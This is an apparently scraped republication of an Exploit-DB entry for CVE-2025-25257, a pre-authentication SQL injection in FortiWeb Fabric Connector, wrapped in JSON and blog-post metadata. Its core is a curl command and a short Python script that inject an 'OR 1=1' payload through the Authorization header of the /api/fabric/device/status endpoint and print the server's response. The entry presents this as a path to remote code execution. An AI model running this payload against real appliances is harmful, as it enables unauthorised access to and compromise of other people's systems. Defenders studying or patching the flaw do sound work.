{“lastseen”:”2026-02-04T13:28:43″,”description”:”Exploit Title: FortiWeb Fabric Connector 7.6.x – Pre-authentication SQL Injection to Remote Code Execution Date: 2025-10-05 Exploit Author: Milad Karimi Ex3ptionaL Contact: miladgrayhat@gmail.com Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”exploitdb”,”title”:”FortiWeb Fabric Connector 7.6.x – SQL Injection to Remote Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52473″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-25257″],”sourceData”:”# Exploit Title: FortiWeb Fabric Connector 7.6.x – Pre-authentication SQL\\r\\nInjection to Remote Code Execution\\r\\n# Date: 2025-10-05\\r\\n# Exploit Author: Milad Karimi (Ex3ptionaL)\\r\\n# Contact: miladgrayhat@gmail.com\\r\\n# Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL\\r\\n# Tested on: Win, Ubuntu\\r\\n# CVE : CVE-2025-25257\\r\\n\\r\\nOverview\\r\\n\\r\\nCVE-2025-25257 is a pre-authentication SQL Injection vulnerability in\\r\\nFortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.\\r\\nThis flaw allows attackers to inject malicious SQL commands into the\\r\\nvulnerable API endpoint, potentially leading to Remote Code Execution (RCE).\\r\\n\\r\\n\\r\\nPoC\\r\\n\\r\\ncurl -k -H \\”Authorization: Bearer aaa’ OR ‘1’=’1\\” \\\\\\r\\n https:\/\/\\u003cfortiweb-ip\\u003e\/api\/fabric\/device\/status\\r\\n\\r\\nPoC Python\\r\\n\\r\\nimport requests\\r\\n\\r\\ndef test_sqli(base_url):\\r\\n url = f\\”{base_url}\/api\/fabric\/device\/status\\”\\r\\n headers = {\\r\\n \\”Authorization\\”: \\”Bearer aaa’ OR ‘1’=’1\\”\\r\\n }\\r\\n try:\\r\\n response = requests.get(url, headers=headers, verify=False,\\r\\ntimeout=10)\\r\\n print(f\\”Status code: {response.status_code}\\”)\\r\\n print(\\”Response body:\\”)\\r\\n print(response.text)\\r\\n except Exception as e:\\r\\n print(f\\”Error: {e}\\”)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n import argparse\\r\\n parser = argparse.ArgumentParser(description=\\”PoC SQLi By Ex3ptionaL\\r\\nCVE-2025-25257 FortiWeb\\”)\\r\\n parser.add_argument(\\”base_url\\”, help=\\”Base URL of FortiWeb (ex:\\r\\nhttps:\/\/10.0.0.5)\\”)\\r\\n args = parser.parse_args()\\r\\n test_sqli(args.base_url)\\r\\n# python3 src\/poc.py https:\/\/10.0.0.5″,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52473″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52473″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-04T13:28:43″,”description”:”Exploit Title: FortiWeb Fabric Connector 7.6.x – Pre-authentication SQL Injection to Remote Code Execution Date: 2025-10-05 Exploit Author: Milad Karimi Ex3ptionaL Contact: miladgrayhat@gmail.com Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”exploitdb”,”title”:”FortiWeb…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-38996","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n